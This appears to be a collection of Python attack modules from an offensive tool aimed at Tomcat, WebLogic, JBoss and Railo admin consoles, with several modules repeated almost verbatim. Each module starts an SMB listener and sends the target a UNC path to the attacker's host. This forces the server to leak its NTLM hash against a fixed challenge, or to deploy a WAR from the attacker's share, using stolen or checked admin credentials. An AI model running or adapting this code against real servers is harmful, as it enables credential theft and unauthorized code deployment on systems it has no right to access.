def run(self, fingerengine, fingerprint): """ Same concept as the JBoss module, except we actually invoke the deploy function. """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC deployer...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) if fingerprint.version in ["5.5"]: uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\ 'deployWar=file://{0}/asdf.war'.format(utility.local_address()) elif fingerprint.version in ["6.0", "7.0", "8.0"]: return self.runLatter(fingerengine, fingerprint, thread) else: utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version, LOG.ERROR) return url = base + uri response = utility.requests_get(url) if response.status_code == 401: utility.Msg( "Host %s:%s requires auth, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_get(url, cookies=cookies[0], auth=cookies[1]) else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin... sleep(1) if response.status_code != 200: utility.Msg("Unexpected response: HTTP %d" % response.status_code) self._Listen = False
def run(self, fingerengine, fingerprint): """ Same as JBoss/Tomcat """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\ '=/com/bea/console/actions/app/install/appSelected' data = { "AppApplicationInstallPortletselectedAppPath": "\\\\{0}\\fdas.war".format(utility.local_address()), "AppApplicationInstallPortletfrsc": None } if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") utility.Msg( "Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint) if cookies[0]: utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() # fetch our CSRF data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF( base, cookies[0]) utility.Msg("Invoking UNC loader...") try: _ = utility.requests_post(base + uri, data=data, cookies=cookies[0], timeout=1.0) except: # we dont care about the response here pass else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin sleep(1) self._Listen = False
def run(self, fingerengine, fingerprint): """ This module will invoke jboss:load() with a UNC path to force the server to make a SMB request, thus giving up its encrypted hash with a value we know (1122334455667788). Thanks to @cd1zz for the idea for this """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener..") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC loader...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = '/jmx-console/HtmlAdaptor' data = self.getData(fingerprint.version) url = base + uri response = utility.requests_post(url, data=data) if response.status_code == 401: utility.Msg( "Host %s:%s requires auth, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_post(url, data=data, cookies=cookies[0], auth=cookies[1]) else: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin... sleep(1) if response.status_code != 500: utility.Msg("Unexpected response: HTTP %d" % response.status_code, LOG.DEBUG) self._Listen = False
def run(self, fingerengine, fingerprint): """ Same concept as the JBoss module, except we actually invoke the deploy function. """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC deployer...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) if fingerprint.version in ["5.5"]: uri = '/manager/html/deploy?deployPath=/asdf&deployConfig=&'\ 'deployWar=file://{0}/asdf.war'.format(utility.local_address()) elif fingerprint.version in ["6.0", "7.0", "8.0"]: return self.runLatter(fingerengine, fingerprint, thread) else: utility.Msg("Unsupported Tomcat (v%s)" % fingerprint.version, LOG.ERROR) return url = base + uri response = utility.requests_get(url) if response.status_code == 401: utility.Msg("Host %s:%s requires auth, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_get(url, cookies=cookies[0], auth=cookies[1]) else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin... sleep(1) if response.status_code != 200: utility.Msg("Unexpected response: HTTP %d" % response.status_code) self._Listen = False
def run(self, fingerengine, fingerprint): """ This module will invoke jboss:load() with a UNC path to force the server to make a SMB request, thus giving up its encrypted hash with a value we know (1122334455667788). Thanks to @cd1zz for the idea for this """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener..") self._Listen= True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC loader...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = '/jmx-console/HtmlAdaptor' data = self.getData(fingerprint.version) url = base + uri response = utility.requests_post(url, data=data) if response.status_code == 401: utility.Msg("Host %s:%s requires auth, checking..." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title, fingerprint.version) if cookies: response = utility.requests_post(url, data=data, cookies=cookies[0], auth=cookies[1]) else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin... sleep(1) if response.status_code != 500: utility.Msg("Unexpected response: HTTP %d" % response.status_code, LOG.DEBUG) self._Listen = False
def run(self, fingerengine, fingerprint): """ Same as JBoss/Tomcat """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = '/console/console.portal?AppApplicationInstallPortlet_actionOverride'\ '=/com/bea/console/actions/app/install/appSelected' data = { "AppApplicationInstallPortletselectedAppPath" : "\\\\{0}\\fdas.war".format(utility.local_address()), "AppApplicationInstallPortletfrsc" : None } if fingerprint.title is WINTERFACES.WLS: base = base.replace("http", "https") utility.Msg("Host %s:%s requires auth, checking.." % (fingerengine.options.ip, fingerprint.port), LOG.DEBUG) cookies = checkAuth(fingerengine.options.ip, fingerprint) if cookies[0]: utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() # fetch our CSRF data['AppApplicationInstallPortletfrsc'] = self.fetchCSRF(base, cookies[0]) utility.Msg("Invoking UNC loader...") try: _ = utility.requests_post(base+uri, data=data, cookies=cookies[0], timeout=1.0) except: # we dont care about the response here pass else: utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) return while thread.is_alive(): # spin sleep(1) self._Listen = False
def run(self, fingerengine, fingerprint): """ Create a search collection via a nonexistent datasource """ if not utility.check_admin(): utility.Msg("Root privs required for this module.", LOG.ERROR) return utility.Msg("Setting up SMB listener...") self._Listen = True thread = Thread(target=self.smb_listener) thread.start() utility.Msg("Invoking UNC deployer...") base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port) uri = "/railo-context/admin/web.cfm?action=services.search" data = { "collName": "asdf", "collPath": "\\\\{0}\\asdf".format(utility.local_address()), "collLanguage": "english", "run": "create" } url = base + uri cookies = checkAuth(fingerengine.options.ip, fingerprint.port, fingerprint.title) if not cookies: utility.Msg( "Could not get auth for %s:%s" % (fingerengine.options.ip, fingerprint.port), LOG.ERROR) self._Listen = False return response = utility.requests_post(url, data=data, cookies=cookies) while thread.is_alive(): # spin... sleep(1) if response.status_code != 200: utility.Msg("Unexpected response: HTTP %d" % response.status_code) self._Listen = False